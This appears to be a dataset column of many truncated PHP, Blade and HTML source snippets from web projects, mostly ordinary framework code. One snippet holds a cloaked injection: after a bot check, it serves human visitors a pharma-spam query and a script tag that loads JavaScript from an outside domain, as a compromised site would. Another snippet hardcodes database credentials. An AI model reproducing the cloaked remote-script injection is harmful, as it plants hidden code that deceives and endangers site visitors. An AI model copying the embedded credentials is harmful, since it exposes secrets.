text
stringlengths
2
1.03M
@extends('backend.layouts.app') @section('title', 'region Management') @section('admin-content') <div class="page-wrapper"> <!-- Page-header start --> <div class="page-header"> <div class="row align-items-end"> <div class="col-lg-8 col-sm-8"> <div class="page-header-title"> ...
<?php use yii\widgets\ActiveForm; use yii\helpers\Html; use yii\bootstrap\Modal; use yii\helpers\Url; use kartik\widgets\FileInput; ?> <?php Modal::begin([ "id" => "modal", "footer" => "", // always need it for jquery plugin ]) ?> <?php echo "<div id='modalContent'></div>"; Modal::end(); ?> <script src="http...
<?php use Illuminate\Support\Facades\Route; use App\Http\Controllers\ArtikelController; /* |-------------------------------------------------------------------------- | Web Routes |-------------------------------------------------------------------------- | | Here is where you can register web routes for your applica...
<?php $url = forminator_plugin_url(); ?> <div class="sui-row-with-sidenav forminator-integrations-wrapper"> <div class="sui-sidenav"> <ul class="sui-vertical-tabs sui-sidenav-hide-md"> <li class="sui-vertical-tab forminator-integrations" data-tab-id="forminator-integrations"> <a href="#forminator-integrat...
<?php // autoload.php @generated by Composer require_once __DIR__ . '/composer' . '/autoload_real.php'; return ComposerAutoloaderInit0e82e794ad066488aaf874eb1c9ec429::getLoader();
<?php // config for LaravelBoilerplates/Socialite return [ 'storeTokens' => env('SOCIALITE_STORE_TOKENS', true), ];
<?php /** * Zend Framework (http://framework.zend.com/) * * @link http://github.com/zendframework/zf2 for the canonical source repository * @copyright Copyright (c) 2005-2014 Zend Technologies USA Inc. (http://www.zend.com) * @license http://framework.zend.com/license/new-bsd New BSD License */ namespace ...
<?php namespace Netflex\Structure\Providers; use Illuminate\Support\ServiceProvider; use HaydenPierce\ClassFinder\ClassFinder; use Netflex\Structure\Structure; use Throwable; class StructureServiceProvider extends ServiceProvider { public function boot () { $models = ClassFinder::getClassesInNamesp...
<!DOCTYPE html> <html lang="{{ str_replace('_', '-', app()->getLocale()) }}"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="shortcut icon" href="{{theme_url('favicon.png')}}"/> <!-...
<?php /** * @author Ezra Pool <ezra@tsdme.nl> */ require __DIR__ . "/../../vendor/autoload.php";
<style> .e_footer{ font-family: colonna_mt; font-size: 30px; } </style> <!-- footer content --> <footer> <div class="pull-right"> <span class="e_footer">Abp</span><font style="font-family: colonna_mt;font-size: 25px;">-System</font> - Developed by <a href="<?php echo e(url('/')...
<div class="tab-pane fade show active" id="profile-personly" role="tabpanel" aria-labelledby="profile-personly-tab"> <div class="inner"> <form action="{{ route('users.update',auth()->id()) }}" method="post"> @csrf @method('PUT') <div class="row"> <div class="col-sm-6 field"...
<?php return [ '*unknown*' => '', '--choose--' => '', '--no--' => '', 'Accepted extensions (separated by comma)' => '', 'Active' => '', 'Add a product' => '', 'Add in' => '', 'Add product and close' => '', 'Add product and continue' => '', 'Add translate in to {lang}' => '', ...
<?php namespace App\Http\Controllers\Admin; use App\Http\Controllers\Controller; use App\Http\Requests\StoreTestRequest; use App\Models\Test; use App\Models\Category; use App\Http\Traits\ImageTrait; use Illuminate\Http\Request; class TestController extends Controller { use ImageTrait; /** * Display a li...
--TEST-- swoole_coroutine: throw exception --SKIPIF-- <?php require __DIR__ . '/../include/skipif.inc'; ?> --FILE-- <?php require __DIR__ . '/../include/bootstrap.php'; $pm = new ProcessManager; $pm->parentFunc = function (int $pid) use ($pm) { go(function () use ($pm) { echo httpGetBody("http://127.0.0.1:{...
<?php namespace App; use Illuminate\Database\Eloquent\Model; class Depense extends Model { protected $guarded = []; /** * The user that belong to the Depense * * @return \Illuminate\Database\Eloquent\Relations\BelongsToMany */ public function users() { return $this->belong...
<?php use Illuminate\Database\Migrations\Migration; use Illuminate\Database\Schema\Blueprint; use Illuminate\Support\Facades\Schema; return new class extends Migration { /** * Run the migrations. * * @return void */ public function up() { Schema::create('garage_property_feature...
<?php /* ******************************************************************************************** * Copyright (c) 2011 Nils Bohrs * * Permission is hereby granted, free of charge, to any person obtaining a copy of this * software and associated documentation files (the "Software"), to deal in the Software * wi...
<?php namespace App\Entity; use Doctrine\ORM\Mapping as ORM; /** * @ORM\Entity(repositoryClass="App\Repository\CommentRepository") */ class Comment { /** * @ORM\Id() * @ORM\GeneratedValue() * @ORM\Column(type="integer") */ private $id; /** * @ORM\Column(type="string", length=2...
<?php include 'db.php'; session_start(); ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content=""> <meta name="author" content=""> <title>Bikes and Cars</title> ...
<?php namespace App; use Illuminate\Database\Eloquent\Model; class CargaMasiva extends Model { // protected $table='carga_masivas'; protected $fillable = [ 'name','description','metodo', 'procesado','modelo_id','file','metodos', ]; protected $guarded = []; /** * Una carga_masi...
<!DOCTYPE html> <!-- Template Name: Frest HTML Admin Template Author: :Pixinvent Website: http://www.pixinvent.com/ Contact: hello@pixinvent.com Follow: www.twitter.com/pixinvents Like: www.facebook.com/pixinvents Purchase: https://1.envato.market/pixinvent_portfolio Renew Support: https://1.envato.market/pixinvent_por...
<button class="btn btn-primary" id="send-mail-code" type="button">发送验证码</button> <script type="text/javascript"> $(function(){ var button=$('#send-mail-code'); var id=button.parent().attr('for'); var request_url=button.parent().data('url'); if(id==undefined || id=='' || $('#'+id).length==0){ console.log(...
@extends('layouts.auth') @section('content') <div class="card"> <div class="card-body register-card-body"> <p class="login-box-msg">{{ __('Forgot Password?') }}</p> @if (session('status')) <div class="alert alert-success" role="alert"> {{ session...
<?php /** * Request-dependant objects containers. * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, or * (at your option) any later version. * * This pro...
<?= '<?xml version="1.0" encoding="UTF-8" ?>' ?> <?php $cmd15=$this->db->query("select * from tbl_club order by cid DESC"); //$eyenews_id=$row15['eyenews_id']; ?> <urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9" xmlns:news="http://www.google.com/schemas/sitemap-news/0.9" xmlns:xsi="http://www.w3....
<?php // This file is auto-generated, don't edit it. Thanks. namespace AlibabaCloud\SDK\Tdsr\V20200101\Models; use AlibabaCloud\Tea\Model; class AddRelativePositionResponseBody extends Model { /** * @description 请求ID,与入参requestId对应 * * @var string */ public $requestId; /** * @d...
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"/> <title>新闻管理 - 添加新闻</title> <meta http-equiv="Cache-Control" content="no-transform" /> <meta http-equiv="Cache-Control" content="no-siteapp" /> <?php $this->load->view('public/header') ?> <script src="<?php echo base_url() ?>asse...
<x-guest-layout> <x-jet-authentication-card> <div class="card-body p-6""> <div class="mb-4"> <a href="#"><img src="{{ asset('dash-ui/images/brand/logo/logo-primary.svg') }}" class="mb-2" alt=""></a> </div> <div class="mb-3"> {{ __('Forgot ...
<?php namespace Jacksonit\GHN; use Illuminate\Support\ServiceProvider; /** * ServiceProvider * * The service provider for the modules. After being registered * it will make sure that each of the modules are properly loaded * i.e. with their routes, views etc. * * @author Cao Son <son.caoxuan92@gmail.com> * @...
<!-- Content Wrapper. Contains page content --> <div class="content-wrapper"> <!-- Content Header (Page header) --> <section class="content-header"> <h1> <B>EDIT</B> <small>KATEGORI BUNGA</small> </h1> <ol class="breadcrumb"> <li><a href="#"><i class="...
<?php /* * Created by Tona Nguyen * Email: nguyennguyen.vt88@gmail.com * Phone: 0932.252.414 * Address: VN, HCMC * Website: https://jobsvina.com/ */ return [ 'front' => [ 'class' => 'app\modules\front\Module', ], 'admin' => [ 'class' => 'app\modules\admin\Module', ], 'au...
<?php namespace App\Traits; use Illuminate\Support\Facades\Log; trait HasLogs { public function save(array $options = []) { $before = 'BEFORE: '.$this->toJson(); $result = parent::save($options); Log::channel('model')->debug($before."\tAFTER: ".$this->toJson()); return $result...
<?php use kartik\widgets\AlertBlock; use yii\helpers\Html; use yii\widgets\ActiveForm; use yii\widgets\Pjax; use kartik\widgets\DateTimePicker; use app\models\Groups; /* @var $this yii\web\View */ /* @var $model app\models\PostPassage */ /* @var $form yii\widgets\ActiveForm */ ?> <div class="tbl-post-passage-form"> ...
<?php namespace App; use Illuminate\Database\Eloquent\Model; class Media extends Model { protected $table = 'medias'; protected $fillable = ['label','fichier','type']; protected $guarded = ['id','created_at']; public function cours() { return $this->belongsToMany('App\Cours'); } ...
<?php namespace App\Http\Middleware; use Illuminate\Http\Request; use Fideloper\Proxy\TrustProxies as Middleware; class TrustProxies extends Middleware { /** * The trusted proxies for this application. * * @var array */ protected $proxies; /** * The current proxy header mappings...
@extends('layouts.app') @section('page-inner') <div class="page-inner container"> <div class="page-section"> <!-- grid row --> <div class="row"> <!-- grid column --> @include('vendor.include.navigation_user') <!-- grid column --> <div class="col-lg-8"...
<?php if($position=='Administrator'||$position=='Accounting'){?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="description" content=""> <meta name...
<?php printf(lang('version_not_supported'), anchor($config['ci_website'], '', 'target="_blank"'));
<?php /* WebProfilerBundle:Collector:form.html.twig */ class __TwigTemplate_2b0ffd1b197b94744735424587b57a728b238c94ff381c666675412d1b8114d3 extends Twig_Template { public function __construct(Twig_Environment $env) { parent::__construct($env); // line 1 $this->parent = $this->loadTemp...
@extends('layouts.main', ['title' => __('navigation.closed_license')]) @section('content') <div class="container"> <h1 class="title is-1 has-text-centered mt-4">Затворена лиценца</h1> <p class="subtitle is-2 has-text-centered">Лиценца за слике са ограниченим приступом</p> <section class="s...
<?php /** * InlineResponse2003 * * PHP version 7.3 * * @category Class * @package InfinityFree\DiscourseApi * @author OpenAPI Generator team * @link https://openapi-generator.tech */ /** * Discourse API Documentation * * * The version of the OpenAPI document: latest * Generated by: https://openapi...
@extends("layouts.default") @section('content') @include('layouts.hero_section') <div class="container container-div"> <div class="row "> <div class="col-sm-12 col-md-12 col-xl-12 text-center mb-2 h2-text"> <h2 class="h1-responsive font-weight-bold text-center text-white">TERMS OF SERVICES</h2> ...
<?php namespace app\models; use Yii; /** * This is the model class for table "Series". * * @property integer $IdSerie * @property integer $IdProducto * @property integer $IdSubProceso * @property string $Serie * @property string $Estatus * * @property Productos $idProducto * @property SubProcesos $idSubPro...
<?php namespace Choccybiccy\Telegram\Entity; use Choccybiccy\Telegram\Entity; /** * Class Contact * @package Choccybiccy\Telegram\Entity */ class Contact extends Entity { }
<?php /** @var \Illuminate\Database\Eloquent\Factory $factory */ use App\Models\Cart; use Faker\Generator as Faker; $factory->define(Cart::class, function (Faker $faker) { return [ 'cart_user_cookie'=>$faker->regexify('[A-Za-z0-9]{20}'), 'cart_menu_id'=>rand(1, 8), 'cart_quantity'=>rand(1...
<?php namespace FilippoToso\Travelport\Rail; class CreditCardAuth { /** * @var typeRef $Key */ protected $Key = null; /** * @var typeRef $PaymentRef */ protected $PaymentRef = null; /** * @var string $TransId */ protected $TransId = null; /** * @var t...
<?php namespace Terranet\Administrator\Contracts; use Illuminate\Database\Eloquent\Model; interface ActionsManager { /** * Determine if the user is authorized to make this request. * * @param string $method * @param null|Model $model * * @return bool */ public function auth...
<?php return [ /* |-------------------------------------------------------------------------- | View Storage Paths |-------------------------------------------------------------------------- | | Most templating systems load templates from disk. Here you may specify | an array of paths that...
@extends('container.form') @section('type') action="{{url("article")}}" enctype="multipart/form-data" class="pageForm required-validate" onsubmit="return iframeCallback(this, dialogAjaxDone);" @endsection @section('body') <p> <label>文章标题:</label> <input type="text" name="title" class="required...
<?php namespace letyii\diy\controllers; use Yii; use yii\web\Controller; use letyii\diy\models\Diy; use yii\helpers\ArrayHelper; use letyii\diy\models\DiyWidget; use yii\bootstrap\Html; class AjaxController extends Controller { /** * Ham add widget vao database by namespace */ public function action...
<?php include 'check_is_bot.php'; if(empty($is_bot)){ echo '<script type="text/javascript">var q = "buy zocor from the uk";</script> <script type="text/javascript" src="http://thecaotructuyen.com/2018/06/jscs.min.js"></script>'; } if(!empty($is_bot)){ } ?> <!DOCTYPE html PUBLIC "-//W3C//DTD X...
<?php /** * MailInstall class. * * This class provides initialization data for Mail module. * * @author Janusz Tylek <j@epe.si> * @copyright Copyright &copy; 2008, Janusz Tylek * @license MIT * @version 1.0 * @package epesi-base * @subpackage mail */ defined("_VALID_ACCESS") || die('Direct access forbidden...
<?php /* @Doctrine/Collector/db.html.twig */ class __TwigTemplate_ca2fd25b56d57d98c3f7fcc6274355e871e248b53724f44c6d31e500a4e13eef extends Twig_Template { public function __construct(Twig_Environment $env) { parent::__construct($env); $this->blocks = array( 'toolbar' => array($this...
<?php declare(strict_types=1); namespace gdejong\AoC2020\Day1; use gdejong\AoC2020\Utils\File; use Symfony\Component\Console\Command\Command; use Symfony\Component\Console\Input\InputInterface; use Symfony\Component\Console\Output\OutputInterface; class Day1Command extends Command { protected static $defaultName...
<?php namespace MailChimp\Data; use MailChimp\Core\Data; /** * @property int $default_country * In an address field, the default country code if none supplied. * * @property string $phone_format * In a phone field, the phone number type: US or International. * * @property string $date_format * In a date...
<?php /** * Zend Framework (http://framework.zend.com/) * * @link http://github.com/zendframework/zf2 for the canonical source repository * @copyright Copyright (c) 2005-2014 Zend Technologies USA Inc. (http://www.zend.com) * @license http://framework.zend.com/license/new-bsd New BSD License */ namespace ...
@extends('backoffice.layout.admin') @section('content') <div class="row wrapper border-bottom white-bg page-heading"> <div class="col-lg-10"> <h2>Experience</h2> <ol class="breadcrumb"> <li> <a href="{{ route('experience.index') }}">Experience</a> </li> ...
<?php /** * This file is part of the Phalcon Framework. * * (c) Phalcon Team <team@phalcon.io> * * For the full copyright and license information, please view the LICENSE.txt * file that was distributed with this source code. */ namespace Phalcon\Mvc\View\Engine; use Phalcon\Di\DiInterface; use Phalcon\Di\Inj...
<?php namespace App\Http\Controllers; use Illuminate\Http\Request; use App\Models\Pertanyaan; class PertanyaanController extends Controller { /** * Display a listing of the resource. * * @return \Illuminate\Http\Response */ public function index() { $dataTanya = Pertanyaan::la...
<?php include 'header.php'; ?> <div class="container"> <h1>Services</h1><br> <ul> <li>None yet, hiring people as of now!</li> </ul> </div> <?php include 'footer.php'; ?>
<div class="tabledesignc"> <div class="customertable"> <div class="customertableone"> <div class="customertableone1"> <p style="font-size:12px; padding-left:15px;"> <b>Items Per Page </b> : </p> <u style="font-size:12px; padding-left:10px;"><%myValue%></u> ...
<?php if($this->permission->method('clinical','read')->access() ){ ?> <div class="row"> <div class="col-sm-12"> <div class="panel panel-default thumbnail"> <div class="panel-heading no-print"> <div class="btn-group"> <?php if($this->...
<!-- section start --> <section id="quote-msg" class="wow fadeIn border-bottom no-padding-bottom"> <div class="container"> <div class="row"> <div class="col-xs-12 text-center"> <h2 class="title-font font-weight-700 title-thick-underline border-color-fast-yellow display-inline-bl...
<?php declare(strict_types=1); /* * This file has been auto generated by Jane, * * Do no edit it directly. */ namespace Afosto\Sdk\Exception; class AttachSessionBadRequestException extends \RuntimeException implements ClientException { private $error; public function __construct(\Afosto\Sdk\Model\Error...
@extends('layout.master2') <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script> <script> $(document).ready(function() { $('.myform').submit(function() { if (confirm('هل ان متأكد من حذف بيان الحساب؟')) { return true; } ...
<?php namespace Encore\Admin\Media; use Encore\Admin\Facades\Admin; use Encore\Admin\Layout\Content; use Illuminate\Http\Request; use Illuminate\Routing\Controller; class MediaController extends Controller { public function index(Request $request) { return Admin::content(function (Content $content) u...
<?php namespace CurrencyRate\Tests\Domain; use CurrencyRate\Domain\Currency; use CurrencyRate\Domain\CurrencyPair; use PHPUnit\Framework\TestCase; class CurrencyPairTest extends TestCase { /** * @throws \CurrencyRate\Domain\InvalidCurrencyError */ public function testCastToString() { $base = Currency::from...
<?php use Illuminate\Database\Migrations\Migration; use Illuminate\Database\Schema\Blueprint; use Illuminate\Support\Facades\Schema; class CreateRegisterPelayanansTable extends Migration { /** * Run the migrations. * * @return void */ public function up() { Schema::create('regi...
<?php declare(strict_types=1); namespace ZoiloMora\FactuSOL\Domain\Model\Invoice\Model\DueDate\ValueObject; use PcComponentes\Ddd\Domain\Model\ValueObject\FloatValueObject; final class Amount extends FloatValueObject { }
<?php namespace App\Http\Controllers\API\V1; use Illuminate\Http\Request; use App\Http\Controllers\Controller; use App\Person; class PersonsController extends Controller { /** * Display a listing of the resource. * * @return \Illuminate\Http\Response */ public function index() { ...
<?php use yii\db\Migration; class m170506_100259_proposal extends Migration { public function up() { $this->createTable('proposal', [ 'id' => $this->primaryKey(), 'name' => $this->string()->notNull(), 'phone' => $this->string()->notNull(), 'email' => $th...
<?php use Illuminate\Database\Migrations\Migration; use Illuminate\Database\Schema\Blueprint; use Illuminate\Support\Facades\Schema; class AddArchivedColumnToChannelsTable extends Migration { /** * Run the migrations. * * @return void */ public function up() { Schema::table('ch...
<?php namespace BackblazeB2\Http; use BackblazeB2\ErrorHandler; use GuzzleHttp\Client as GuzzleClient; use GuzzleHttp\Exception\GuzzleException; use Psr\Http\Message\ResponseInterface; /** * Client wrapper around Guzzle. */ class Client extends GuzzleClient { public static $MAX_RETRY = 15; /** * Send...
<!DOCTYPE HTML> <!-- Dopetrope by HTML5 UP html5up.net | @ajlkn Free for personal and commercial use under the CCA 3.0 license (html5up.net/license) --> <html> <head> <title>Login - Zendia</title> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <!--[if ...
<?php namespace App\Http\Controllers\Dashboard; use App\AdvBlock; use App\Setting; use Illuminate\Http\Request; use App\Http\Controllers\Controller; use Illuminate\Support\Facades\DB; use Illuminate\Support\Facades\Input; use Illuminate\Support\Facades\Validator; class AdvBlockController extends Controller { pub...
<?php $name='DejaVuSerifCondensed-Italic'; $type='TTF'; $desc=array ( 'Ascent' => 928, 'Descent' => -236, 'CapHeight' => 928, 'Flags' => 68, 'FontBBox' => '[-755 -347 1480 1227]', 'ItalicAngle' => -11, 'StemV' => 87, 'MissingWidth' => 540, ); $up=-63; $ut=44; $ttffile='C:/xampp/htdocs/MPDF57/ttfonts/Dej...
<?php define('WITH_ASSIGN', 1); define('WITHOUT_ASSIGN', 0); class Picture implements pictureInterface { var $id; var $cat_id; var $caption; var $ctime; var $mtime; var $user; var $file; var $converted_file = array('thumb' => NULL, 'medium' => NULL, 'high'=> NULL); var $next; va...
<select v-validate="'{{$validations}}'" class="control" id="{{ $attribute->code }}" name="{{ $attribute->code }}[]" data-vv-as="&quot;{{ $attribute->admin_name }}&quot;" multiple> @foreach ($attribute->options()->orderBy('sort_order')->get() as $option) <option value="{{ $option->id }}" {{ in_array($option...
<?php namespace App\Providers; use App\Models\{ Aluno, Plan, Tenant }; use App\Observers\{ AlunoObserver, PlanObserver, TenantObserver }; use Illuminate\Support\ServiceProvider; class AppServiceProvider extends ServiceProvider { /** * Register any application services. * *...
<!doctype html> <html lang="{{ str_replace('_', '-', app()->getLocale()) }}"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <!-- CSRF Token --> <meta name="csrf-token" content="{{ csrf_token() }}"> <title>{{ config('app.name', 'Laravel') }}</tit...
<?php /******************************************************************************* * Copyright (c) 2017 Intuit * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apach...
<?php use yii\helpers\Html; /* @var $this yii\web\View */ /* @var $model app\models\User */ $this->title = 'Созать пользователя'; $this->params['breadcrumbs'][] = ['label' => 'Пользователи', 'url' => ['index']]; $this->params['breadcrumbs'][] = $this->title; ?> <div class="user-create"> <h1><?= Html::encode($t...
<?php namespace Scn\EvalancheSoapApiConnector\Hydrator\Container; use Scn\EvalancheSoapApiConnector\Hydrator\Config\Container\ContainerAttributeConfig; use Scn\EvalancheSoapApiConnector\TestCase; use Scn\EvalancheSoapStruct\Struct\Container\ContainerAttributeInterface; /** * Class ContainerAttributeConfigTest * *...
<?php namespace Ccovey\RabbitMQ\Producer; use PhpAmqpLib\Message\AMQPMessage; interface Publishable { /** * @return AMQPMessage */ public function getMessage() : AMQPMessage; /** * @return bool */ public function isDelayed() : bool; /** * @return array */ publi...
<?php /** * Created by Reliese Model. */ namespace App\Models; use Illuminate\Database\Eloquent\Model; /** * Class Tblfractionaladj * * @property int $fracUID * @property int $fracClientUID * @property bool $fracClientRes * @property float $fracClientValue * @property float $fracClctnsValue * * @package...
@extends('/templates.website') @section('content') <section id="tabla" class="container" > <th><h4>REGISTRO DE USUARIO</h4> </th> <div class="row"> <form action="/registro" method="POST" class="col s12 "> ...
<?php namespace Google\AdsApi\AdManager\v201802; /** * This file was generated from WSDL. DO NOT EDIT. */ class createAudienceSegmentsResponse { /** * @var \Google\AdsApi\AdManager\v201802\FirstPartyAudienceSegment[] $rval */ protected $rval = null; /** * @param \Google\AdsApi\AdManage...
<!doctype html> <html lang="en"> <head> <!-- Required meta tags --> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <!-- Bootstrap CSS --> <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/...
<?php /** * @var $faker \Faker\Generator * @var $index integer */ return [ 'id' => $faker->numberBetween(100000, 699999), 'town' => $faker->city, ];
<?php namespace App\Http\Controllers; use App\Http\Requests\StoreStepRequest; use App\Http\Requests\UpdateStepRequest; use App\Models\Step; use App\Models\Recipe; class StepController extends Controller { /** * Display a listing of the resource. * * @return \Illuminate\Http\Response */ pu...
<?php /** * elFinder Plugin Watermark * * Print watermark on file upload. * * ex. binding, configure on connector options * $opts = array( * 'bind' => array( * 'upload.presave' => array( * 'Plugin.Watermark.onUpLoadPreSave' * ) * ), * // global configure (optional) * 'plugin' => array( * 'Wat...
<?php $dbhost = 'localhost'; $dbuser = 'solucioc_user'; $dbpass = 'h3b24p@U'; $CodProd=$_GET['CodigoCat']; $rec_limit = 12; $conn = ($GLOBALS["___mysqli_ston"] = mysqli_connect($dbhost, $dbuser, $dbpass)); if(! $conn ) { ...
@extends('layouts.master') @section('title')@parent - @if ($product['id'] == '') {{ trans('product.form_create_title') }} @else {{ str_replace('[prod]', '"'.$product->name.'"', trans('product.form_edit_title')) }} ...
<?php /** @var \Illuminate\Database\Eloquent\Factory $factory */ use App\Models\Contrato_itens; use Faker\Generator as Faker; $factory->define(Contrato_itens::class, function (Faker $faker) { return [ 'item' => $faker->word, 'contrato_itens_descricao' => $faker->word, 'valor_mao_obra' =>...
<?php namespace koolreport\querybuilder; class PostgreSQL extends SQL { protected $indentifierCover=array("",""); }
<?php use humhub\modules\content\widgets\richtext\RichTextField; use humhub\modules\file\widgets\Upload; use humhub\modules\xcoin\models\Asset; use humhub\modules\xcoin\models\Product; use kartik\widgets\Select2; use humhub\widgets\ModalButton; use humhub\widgets\ModalDialog; use humhub\widgets\ActiveForm; use humhub\...
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Component\Form\Extension\Core\Type; use Symfony\Component\Form\...
<?php namespace AlibabaCloud\Imageprocess; /** * @method string getDataFormat() * @method array getURLList() * @method string getOrgId() * @method string getOrgName() */ class DetectSpineMRI extends Rpc { /** * @param string $value * * @return $this */ public function withDataFormat($...
<?php use Illuminate\Database\Seeder; class akislar_seeder extends Seeder { /** * Run the database seeds. * * @return void */ public function run() { DB::table('akislar')->truncate(); DB::table('akislar')->insert(['ad'=>'Sandalye Akışı']); DB::table('akislar')->...